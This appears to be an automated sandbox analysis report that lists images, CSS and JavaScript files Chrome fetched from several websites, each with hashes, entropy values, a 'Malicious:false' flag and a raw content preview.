                                              SHA-256:6752B9BA151A25703B2E5D17AD9FF42615F8940B591694FA8E42AB1034F476B5
                                              SHA-512:315ECAF3ECBE80B201A150F9F65408622711EB989AAAE933BDFFE7C1AB05D27AA13DACB9C3FF6526654CDA13037272B53A730609D54AFA242B27B9733C941DD7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css
                                              Preview:/*!. * Font Awesome Free 6.2.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1778x1000, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):127310
                                              Entropy (8bit):7.998265911102095
                                              Encrypted:true
                                              SSDEEP:3072:4nK1IafhAguGqZp3DNOb+GeKBIuN8oaA7jAONdcKULpCWL4WwBze:ZfaZDNOb5ZBWZA7jCKGCg4g
                                              MD5:981F08E4358DA87F32F92DF013DA58FD
                                              SHA1:3E1547FB5B226C5803143AE2BDB833A95CF6278C
                                              SHA-256:BF35905A551D8CD03AC637D50F3189360F389E2D60CE7DA4212E7DFE535B4088
                                              SHA-512:975C5D08F05B29250FFE866F625BB9F66941A13CB9004F8FD713BFF185EF6E5588A2721D595C79E4233F5576C531BC349F700B4F0F94A0C62C9DE45E5BD5D178
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/sec-bg.webp
                                              Preview:RIFFF...WEBPVP8 :........*....>Q(.F#...#tz!...gA...g.?.5/.~.18.^...yI......l....._Y.d..._..>...#._..?.yE...........z.....^...?....=.K...'Xo..._....|.....?.....~..p.=...../.......v..?....;.....{.=$t........................s......zE./......;...O....K.......,.............|.~a.S.G._W......./......o..bou..._.G.?.?w.......o......C.........~.........`....}T.........?.......I....'........~ .......X.>.a.u.@....v3.@I.%.0.s...Q>.0..-15...m4m|^.....N..('.'........i..<....P<...%...c........7m..Q.\TBh....o....L..=>v...>.p.$..R.$.C....W..~5H.........v..tZ..].W.+a_..;PI...*.H.....c................1[Z....4.?..1.!4...M....!.d..._....M.U#..e~..<EW9Ek:...k...~Q.@|..["*B...O...JI.KC..Z...v.Z.&.,...J...5.(.L.W.}..D'....a.O...*w)e&.....#W..q^.b@.J....f.z....)..0F....k...tM....j..fL.../..H..4....?. .x).O..L.|Q...Y....!mI.r.A..k.....q@../.3.:...>.[.px..3..:v..`......e.:.h.x.....#..8..8.78.y.&...Yd.....j.Z...h..y...#..l..n?.fE.}.N...aI%.P.5,X..f....8.. ...-......%.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15204
                                              Entropy (8bit):7.6852931209739745
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw5YN/ATLTQYCsm5hv18fMA7ieKM5vnhQJGzLwlWIKlk:4YNg75YNeLMsm57QMNMdnhQJKwgBi
                                              MD5:4ABF4A44DEA0A91D6462B2851191B031
                                              SHA1:54762184DA090AF36CACCD0C4C94F349900C7BBE
                                              SHA-256:D43355E3AC32F88FE68780C2D51BF07ED28216E584F02C64BDBBC700BA0CB044
                                              SHA-512:862FBDCBC6FCA391CFD4FB4CB09D95C8261D73713408E248E13B7F543F139B4048D20B8481EBB23EE78B86A71E7A07A26935D075330A1A307769AFC0FF7E106A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 150 x 209, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):7847
                                              Entropy (8bit):7.958894104401708
                                              Encrypted:false
                                              SSDEEP:192:5S0vKpd4vC9gg9py+WuEkxZpgsdS1dp16+U0NdUE1Z:g062aSgMuE+ZpPdS1dSLO2Ev
                                              MD5:B05D49CEB0A9C7A6DF66440D9630EC69
                                              SHA1:24BB59CC9933FD7133BBDA72506EDFDD8D6A37CC
                                              SHA-256:41F4E1352423634B8D717285775537AD988910C882E0A7C4081D8B1A9B4FF27D
                                              SHA-512:D8C206CCABAA4389A95AF2CF1EAEFE5E254F10CB3B7FD315CAA75E70ADBF28BEE6CBCC88D900B2B5BACEE8A04FF54CE95C6CBC8174628E2300D360227C16746C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/shape/21.png
                                              Preview:.PNG........IHDR..............\K6....pHYs.................sRGB.........gAMA......a....<IDATx..]...G.~....Y72..v..+.....9.......p.....@....nN@[Zi.....v.6.5...3c..........j.'..*2.23.|?_.../..+`0:.....0...@...`0:.....b........!......2z.,T..`0..T.I..0..B..!...9T..J....B..#(.....+g........*0..cxa..y-.r....Jh................Q.g1:A............\.K..s....:p......V.1..X}L,.8.g....].yL.#.|.`.<.x=.6.2x~.........~.vq.........`0f..WS.&..C..rGT7`...U7H.M.PE.......|..].X..;d..(/.V...../.A.=`0R...?l|=.~.W..CF......../_.......p.....[x-....!..F....S.W..}...-.A..........j.....<.....EAF.....Obp.%.fd.8.bL..Z...1.....X...Z....."..r.n.."$-...".@.._.mR.D,.ZEQ.....\.w76.%...-.....R[....c......y.5HGy~..%~..)...hE,..T..3...Bj..+.`... 6...L.q.K.0..../....L.b..a..>n..-fr../.~..R|.........-..s....{.....)..U..ow`..E,.N.._...O../).J.B#..?...R=...(.%=.fNt.&:...i%.1......T........HH..R....._uV..+t......)....$..w.CtN,..ky.........Z|.E*Bo."0...}...+..L..C.".N,...?..R....d!..g....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):417402
                                              Entropy (8bit):7.998776535538604
                                              Encrypted:true
                                              SSDEEP:12288:4+qCN+NmguRTv5qNFFaZx2N7vnzL01Hwl:4g6sTv8NFFGAVPzLsHwl
                                              MD5:2A6DB2EE27FE2A128C37A7476FA76297
                                              SHA1:FC842F9BB139B445D6D3FE4BBEF44A2E29FA2E56
                                              SHA-256:7D54F2C890AC6F61DF11A61D6EEA2C465FC0F403D52F44395674136500C1A8E9
                                              SHA-512:8FB8A3ED1695D8CA0D91AD1AECF99D404B600E78A673169E8F6431DB8283E64069FE7DF2E8DEE566721A5B76C3E55E6C983D0B40ACEDBA71A0725BB8435E9609
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/1/c10a34a38c54c09dea6d4e76cb363989.webp
                                              Preview:RIFFr^..WEBPVP8X..............VP8 .]..0."..*....>.l.R.%...S.k...en-~......ymn.o...#...0..9.(.O..?......8..-C....E.......+...~c..}..[.......:...._..8|.-e......|.....[.....W.................>...~w.......#........Q..z........7.W..._............/.:.......W...?..@......?..........x.......?../.........GP..|Z.3............k.....?>-.k....?'./...o.......c.....?.{#...............S._..Z.........7.o.......f~..;.....Wn/K........&..0...L.2aq....\d..&..0...L.2aq.*....wy.g.......}r(.6r....P.....z.....V..?.._..{.^.G'..M.<,c..[.......;..X..?f.2..#.V...0f/ rC.4....T.R...X.......3..2|............|.XT.AW...<:......J.Ei..k.."..V.T..."..G..c.c..U.!...M......]..B...L$..W.n......U.a..U.e.u7..&Q.4..&..0...2.7.0:...\d..&..0...L.2aq.........t...Y.h......q._..1;...E}.(......M.aR=-VO....#....:.(.8..A-.....d.o...S,./..Zn._..R.G.U...3...t....K.../.e...X..v....r....J,.^..t..y.....+{..;.-g.......q...^.k..y*z.f...!u...(.b.....*...&.2Z.A.m.o..4.FQ..........J...7l.W.......P...l
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2500x1335, components 3
                                              Category:downloaded
                                              Size (bytes):165418
                                              Entropy (8bit):7.53929226063658
                                              Encrypted:false
                                              SSDEEP:3072:gRrBfkt0HljttBPDjLxCrHMZvUZ6gUtw9WcER8vMjG2ccjb0oPvAs7rJUi:gRrBf7BPIev29uOv9voPDyi
                                              MD5:5FCED74A534806E15B01ECA8A25956C4
                                              SHA1:6F01AD35C78D6E03762972618DD1F58E6EA7833B
                                              SHA-256:3496EA6CD76F690D201AA55EAE93AE7983C0B280257C271409B5AB30B538BA08
                                              SHA-512:3D7FD8B64213800F4D638761DD2C0226A20F790FCC17F9D19DAFA8E2F26540C71C7BF89D27FB67F32F14DBF2F19CA4B3321E7989FEDBE9826488007EA45AA8F4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/images/bg/14.jpg
                                              Preview:......Exif..II*.................Ducky.............)http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:674A96AFB83611EB8BCFABEC85605DC7" xmpMM:InstanceID="xmp.iid:674A96AEB83611EB8BCFABEC85605DC7" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84CBB63DA50211E79A8ADFD67E9C93F7" stRef:documentID="xmp.did:84CBB63EA50211E79A8ADFD67E9C93F7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16737
                                              Entropy (8bit):7.726132979630559
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwNADSXzRZXGdXzPv7KupdGJqbNvvRQN6K8mAmLz8MBmiQxWCcGV24T5uG5:4YNg7NAWLXebvlpKIJJK8VmLfkNRDE83
                                              MD5:8120B45EEFA2067378080AA9C90133CA
                                              SHA1:6DE233CBB61BAC1259FF56CAADA66428214E8035
                                              SHA-256:24A4235C9096042FBF5B2C5DB03FCB6DEF4CC5C586111F67A7F4D5D48D62B7CF
                                              SHA-512:63DBAD59753084E543BFCFD97FFAC62B17464B8A6788EFED52B53351ADF2485F4B61DED8B99D9016A77579496D57DC95564D54C59695D7A1A662C096001C24F5
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12459
                                              Entropy (8bit):7.584941741656639
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwfbsLLcx0PM4B4EXVIauDAKjucr/6k5E05LJ+BMiPoyoXNhiyzq1Ny4:4YNg7fbcbMwTXVIlDA+Tz5EsVmNomLy4
                                              MD5:FCD547120D67B24AB84CD2BA72967197
                                              SHA1:F12BB3BEE6C3278845F8B179C519AB1D05398C1C
                                              SHA-256:DB8BD630C23A4577B1403D0EE6C7F7463EC4B0DA6B162A7C4A2710AB8C63CA7B
                                              SHA-512:B08926B3EA82DE22933D0CA19597F7585D5A0E4E6ABEFE017423453128B0DBB606FCFA48105597CDC6ED17A8760EE190CF1164206B9869ABB82592A2F77ED08E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):17542
                                              Entropy (8bit):7.984190376442565
                                              Encrypted:false
                                              SSDEEP:384:kwt8o6a4n+mCKg9NP+QXI1IPp60rFQuaKtiJguIobdEdLtWW88:58na4nyD2gLfiJguFs88
                                              MD5:B282A81A125D56B3A08B5986A419D3D5
                                              SHA1:F6DFA0C8509A3ED5AC581AF04958100068EC9665
                                              SHA-256:03D2CA858A279DDC78B49504D2952CD3974B7FDCE96F39FC2C3FD7128595813B
                                              SHA-512:4690E6275E4AE25953AEEF843C1BBCC3720B6F83FD48D6FA4A994A76610AEEA3D6968C0522604F3ACF46B14944C55585422E1A54A276321B6EFE29AD3111B265
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF~D..WEBPVP8LqD../..?.?..D.'8_.P5]...?w.......U....]....,i..W.u.........O....4Z!%..2..3.A..%" K@...Lc....:....D"..D.......H...G.u....g.....;..@F.Z..)...K._@.I.?...Cqv....Q.......:.;WvL.X..c..5.k.W#.L.$..).,. .....H...J..........\V\_S....f....U...'Z.....+X... ..+...P.nm.-..\......#...6;..x|...-f:.gU....&m;%..-...M...'.A.`!...5&..q.Kk2{./......,.}5....8....B.....XZ.N.[..........r/.t..".+o...3....l_....N.s/..NUE._.$.u+...Q... y?...K....=......Q.=..pB...e..W...6__a.v.%.+._l.78...WO7..O~.m.{...Mr?..~.<....Hi...M.z......o.>.....D.7...i...E....R..%.N%b....D....<..P)....O....&..../...w2..J|..m..?.<y.....=.....o?...........m......O...w^.....3:&kFt;d(.M.o/O..R.R1...\.P.o>.N.#.T.n......X....Te.6.O.....x_...0..7.O.......*}....1sz......v..".......Z3h.i..~.Q....3.-'b}...U..7IWw....o...g;Y....qe.oj.z..j.$.6.N.7*2{..{..z..o.v...twA...c.}.....7.....p7o;'w.....J.<..*.@....r.$..RE.v.M..X.}._/."r....r.xz..09M...J:..`.ww.IF7....;.<.~th.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3664)
                                              Category:downloaded
                                              Size (bytes):296574
                                              Entropy (8bit):5.4789881757349805
                                              Encrypted:false
                                              SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                              MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                              SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                              SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                              SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/common.js
                                              Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12654
                                              Entropy (8bit):7.593108088763322
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwk+G96a0mTWoW1M9odxlhTAWC3d+qXmASaOr:4YNg7kz6XmHeM+dpA53ZXVSaOr
                                              MD5:417C0D86B18D5E93BAD80FF050DC49EC
                                              SHA1:A75BC9CA320780B91B1C28154D371A2F91F188E0
                                              SHA-256:7B2932B3D18E44941E0AFCB4659745488FD47F7AB03CA6B620BE1CC9B3B8188D
                                              SHA-512:77724857513B666B3DF1CE67159C48535616539E068243A5E3E77EC96D33A03CACCEC9DBFC92E5F673D6752BC1E1CB11272333B07A739361EAD81DA51B97C80A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6823
                                              Entropy (8bit):7.944544030321103
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSiG/BE3j71swoTWWdCca03Pw/vJdzivwUY:UIIHUCD4wa3SHA71sxWWdCtLvJdziu9
                                              MD5:878C1F0299C138A48FEAE58169454901
                                              SHA1:52F3604318B189886614FABF6E197AEEFA7EEB26
                                              SHA-256:34B0F70309C9F6F2431FA9DFD68DEAF747C3DC527D9C1B19B3A62A021C004CD7
                                              SHA-512:B47BEED2442182715C1DC524EA402137239C8456894ACE20218365252BCBC3D1F4CE1F361B38B29A15C99A73E37EEC57105273DC43A1A8C400086F8B3EEC2439
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):15898
                                              Entropy (8bit):7.7135808882968195
                                              Encrypted:false
                                              SSDEEP:384:4YNg7MZQHoFvW+uQhaXIe6U3WPCJg5owKzU6dKu:4Yy4ZQHoVtVhaXZ3WPCJao9t
                                              MD5:EB5828BDCDFD2B2752D4CEB9BF3DAEF9
                                              SHA1:E1B523379A7ED1DB1592BEC893ED0934FF3E157A
                                              SHA-256:C1C7A9C3689A378C485E7CC3B2B6AE69582B2D2DF7FADA11580BFF10206AB69D
                                              SHA-512:041B7A2D9C30AC6422F024F9E9674FDDA74BC5BC20C9D52A1480257DBA137B43F697EE016479A070E5A1662E59CC28E7DC9AE466E4187A4E2F45B46861897A13
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (568)
                                              Category:downloaded
                                              Size (bytes):2440546
                                              Entropy (8bit):5.605899297237629
                                              Encrypted:false
                                              SSDEEP:24576:OF2WXHwMREkneFtJ3J6b9x381+Z50eqwGJfCo:22WXHBzeFtZJ6b9q1+ZIh
                                              MD5:18D3FFE23750BB19A0AE4F42100E0DCB
                                              SHA1:4A3D55A8A16CA835020CE0E71C5C9E423DAC83C5
                                              SHA-256:DC4E4B489C989B71573A2BB3C6FDE2E2681C94D7B4033396837CCDC8F867C155
                                              SHA-512:5D8ECB2D7B480DEABBB65259E04BD13330725F521490DB6B0E0335FBCDA02E747A25D92FC9BA05ECEA6ECC0D7E441E4437D2F17FE194961B1DF833F8F777B882
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/base.js
                                              Preview:var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16841
                                              Entropy (8bit):7.738374181546845
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Fey1aAazPcjRQvOodVEPIHG8oqGbVLoWEGHL:4YyXazAjRfPIHG8tq9oWXr
                                              MD5:D61BB9D44A345EDADD1BBE4241B23318
                                              SHA1:C316691BD15D74A25C2F09C6A2B9426C27BE9175
                                              SHA-256:FBA700A2320D5A99DE292B89D03A8C1117E6462AD567310EABC134173FF435DD
                                              SHA-512:52F010131C0DCE91C059870C5D30B2CBB9BC0EDE21C41CE28EA26B427842E72E623463A4351806A46F81F1398749F2C8253AB582287622C34B00DF945338F7AF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/16/584528b2d9c442dd207147586ccbfa6f.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 4-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2437
                                              Entropy (8bit):7.907744844554134
                                              Encrypted:false
                                              SSDEEP:48:usigXCUVww9c5MLHVDZMrVeYZfAbEQthUefYwhHTMhKgQOGgGnc:us0/w9ce9ZCVHAdEM1HT5JOWc
                                              MD5:99F9D1CC4336E126C11D645BA350068F
                                              SHA1:401D67990378C1F42DD4209DFE37F20FB2A87B84
                                              SHA-256:FB0FB61B6C10000393188BCF6F10A8E54A98F550A431127E10EDC270A26EEC95
                                              SHA-512:233E21A14FAA6AC86CDF44A2AD3D96DC064FECEED4263F9957BF2EEBD47C01CF57478A06666547B5DC4AC545C88FD6F2DD235A7261733A9FFFFB9F73B137B593
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/squarespace.png
